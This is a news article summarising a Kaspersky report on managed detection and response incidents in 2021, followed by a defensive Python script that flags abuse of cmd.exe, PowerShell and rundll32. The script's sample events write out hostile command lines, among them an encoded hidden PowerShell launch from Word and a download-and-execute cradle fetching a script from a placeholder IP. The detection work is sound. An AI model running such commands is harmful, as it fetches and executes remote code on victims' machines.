
14% of incidents detected by MDR teams are high severity incidents, says Kaspersky report


Every type of organization at some point encounters a cybersecurity breach that leads to a high severity incident, and with every passing year the share of human-driven targeted attacks keeps increasing. According to a report by Kaspersky, Managed Detection and Response (MDR) teams detect an average of one new critical incident per day.

Read on to learn what kinds of incidents these are, which industries and regions are attacked the most, and what tools and techniques attackers are using.

According to the report, in 2021, 14% of detected incidents were high severity incidents: human-driven attacks or malware with a major impact. Medium severity incidents made up 66%, and low severity incidents, those without a significant effect on corporate business processes, accounted for 20%. By region, Europe (47%) encountered the most attacks, followed by CIS (23%), APAC (16%), META (6%), North America (5%), and LATAM (3%).

The graph below shows the distribution of high, medium, and low severity incidents across industries.

(Image: severity of incidents by industry)

Analysis of the high severity incidents 

The report says that phishing, user execution, and exploitation of remote services were the most common ways organizations fell victim to critical incidents.

  • 32.4% of organizations reported high severity incidents, of which over 40% were related to targeted attacks/APT.
  • 5.4% of surveyed organizations faced critical incidents resulting from insider activity, amounting to around 3% of reported incidents.
  • Malware caused 14% of high severity incidents, affecting 14.7% of organizations.
  • 16.2% of organizations encountered such incidents as part of ethical offensive exercises (18% of incidents).
  • 8.8% of organizations experienced incidents related to social engineering attacks.
  • 13.2% of organizations cited critical vulnerabilities as the reason they came under attack.

The report treats successful social engineering attacks and critical vulnerabilities as indicators of possible APT activity. Government, industrial, IT, and financial organizations had the largest number of APT-related incidents; APT activity was also detected at development and telecom companies.

Financial and IT organizations top the list of those affected by red teaming incidents. Almost all sectors, except development, telecom, and education, had conducted red teaming exercises and reported incidents arising from them.

Tools used 

Attackers used a wide variety of LOL (Living Off the Land) tools in high-severity incidents. The most popular were cmd.exe, powershell.exe, and rundll32.exe.

(Image: tools used in incidents)
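As an added example (illustrative code written for this article, not tooling from Kaspersky or the MDR report), the following toy rule set shows how an MDR analyst might flag abuse of the three LOLBins named above in process-creation telemetry and tag each finding with a MITRE ATT&CK technique ID. The event fields, regex patterns and sample command lines are assumptions constructed for the demonstration; the technique IDs are the public ones for PowerShell (T1059.001), Windows Command Shell (T1059.003), Rundll32 (T1218.011) and User Execution: Malicious File (T1204.002).

```python
"""Toy LOLBin triage over constructed Windows process-creation events.

Added example, not code from Kaspersky or the report. Field names, patterns
and sample events are assumptions made for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the created process
    cmdline: str  # full command line as logged


# Office/mail clients launching a shell is the classic follow-on to a phishing lure.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Assumed (and deliberately non-exhaustive) patterns for suspicious LOLBin use.
ENCODED_PS = re.compile(r"(?i)\s-(?:enc|encodedcommand|ec|e)\s")
HIDDEN_PS = re.compile(r"(?i)-(?:w|windowstyle)\s+hidden")
DOWNLOAD_PS = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biex\b")
RUNDLL_SCRIPT = re.compile(r"(?i)rundll32(?:\.exe)?\s+(?:javascript|vbscript):")
RUNDLL_USER_PATH = re.compile(
    r"(?i)rundll32(?:\.exe)?\s+\S*\\(?:temp|appdata|programdata|public)\\\S*\.dll"
)


def detect(event: ProcessEvent) -> list[tuple[str, str]]:
    """Return (ATT&CK technique ID, reason) pairs that fire for one event."""
    hits: list[tuple[str, str]] = []
    parent, image, cmd = event.parent.lower(), event.image.lower(), event.cmdline

    # User execution: a document or mail application spawning a shell.
    if parent in OFFICE_PARENTS and image in SHELLS:
        hits.append(("T1204.002", f"{parent} spawned {image}"))
        if image == "cmd.exe":
            hits.append(("T1059.003", "command shell launched from an Office process"))

    # PowerShell: encoded command, or hidden window combined with a download cradle.
    if image in ("powershell.exe", "pwsh.exe"):
        if ENCODED_PS.search(cmd):
            hits.append(("T1059.001", "encoded PowerShell command"))
        if HIDDEN_PS.search(cmd) and DOWNLOAD_PS.search(cmd):
            hits.append(("T1059.001", "hidden PowerShell window with download cradle"))

    # Rundll32: inline script execution, or a DLL loaded from a user-writable path.
    if image == "rundll32.exe":
        if RUNDLL_SCRIPT.search(cmd):
            hits.append(("T1218.011", "rundll32 executing inline script"))
        if RUNDLL_USER_PATH.search(cmd):
            hits.append(("T1218.011", "rundll32 loading DLL from user-writable path"))
    return hits


def triage(events: list[ProcessEvent]) -> dict[str, int]:
    """Count events per technique (an event counts once per technique it triggers)."""
    counts: dict[str, int] = {}
    for ev in events:
        for tech in {t for t, _ in detect(ev)}:
            counts[tech] = counts.get(tech, 0) + 1
    return counts


# Constructed sample telemetry (not real data): four suspicious events, two benign ones.
SAMPLE_EVENTS = [
    ProcessEvent("winword.exe", "cmd.exe",
                 "cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("cmd.exe", "powershell.exe",
                 "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell.exe -NoP -W Hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/a.ps1\')"'),
    ProcessEvent("explorer.exe", "rundll32.exe",
                 r"rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,Start"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcessEvent("services.exe", "rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for tech, reason in detect(ev):
            print(f"{tech}: {reason} | {ev.cmdline}")
    print(triage(SAMPLE_EVENTS))
```

The two benign events show why parent/child context and command-line content matter more than the binary name: a signed script run by an administrator and a system rundll32 call produce no findings, while the same binaries spawned from Word, carrying an encoded payload, or loading a DLL from a temp directory do. Real deployments would add allow-lists for known administrative jobs and hash or signer checks on the loaded DLL.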

Inferences: 

  • Human-driven targeted attacks are increasing year after year, so manual threat hunting alongside classical alert-driven monitoring is an effective way to detect them.
  • As more than 14% of high-severity incidents are related to malware, comprehensive anti-malware protection is imperative.
  • Red team exercises are an effective approach to assessing an organization's security.
  • Using the MITRE ATT&CK framework in threat detection to track adversary tactics and techniques will strengthen the organization's security.

Image and source credits: Kaspersky 
